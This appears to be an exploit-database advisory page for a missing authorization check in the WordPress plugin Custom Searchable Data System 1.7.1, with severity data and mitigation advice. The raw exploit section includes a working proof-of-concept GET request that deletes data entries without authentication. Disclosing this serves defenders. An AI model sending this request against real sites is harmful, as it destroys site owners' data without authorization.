Wordpress Plugin Custom Searchable Data System - Unauthenticated Data modification

vendor:

Custom Searchable Data System

by:

Nawaf Alkeraithe

5.5

CVSS

MEDIUM

Unauthenticated Data modification

287

CWE

Product Name: Custom Searchable Data System

Affected Version From: 1.7.2001

Affected Version To: 1.7.2001

Patch Exists: NO

Related CWE:

CPE: a:wordpress:custom_searchable_data_entry_system:1.7.1

Metasploit:

Other Scripts:

Platforms Tested:

2020

WordPress Plugin Custom Searchable Data System – Unauthenticated Data modification

Plugin fails to perform authorization check to delete/add/edit data entries.

Mitigation:

Either remove the plugin or apply authorization check to all actions.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Custom Searchable Data System -
Unauthenticated Data modification
# Date: 13 March 2020
# Exploit Author: Nawaf Alkeraithe
# Vendor Homepage:
https://wordpress.org/plugins/custom-searchable-data-entry-system/
# Software Link:
https://wordpress.org/plugins/custom-searchable-data-entry-system/
# Version: 1.7.1

Plugin fails to perform authorization check to delete/add/edit data entries.

PoC (delete entry):
GET /wordpress/wp-admin/admin.php?page=sds-form-entries&sds-del-entry-first-entry-id=[ENTRY
ID1]&sds-del-entry-last-entry-id=[ENTRY
ID2]&sds-del-entry-table-row=wp_ghazale_sds_newtest_inputs

Note: plugin is not maintained now, either remove it, or apply the
authorization check to all actions.

Special thanks to *Wordfence and Sean Murphy!
(https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/
<https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/>)*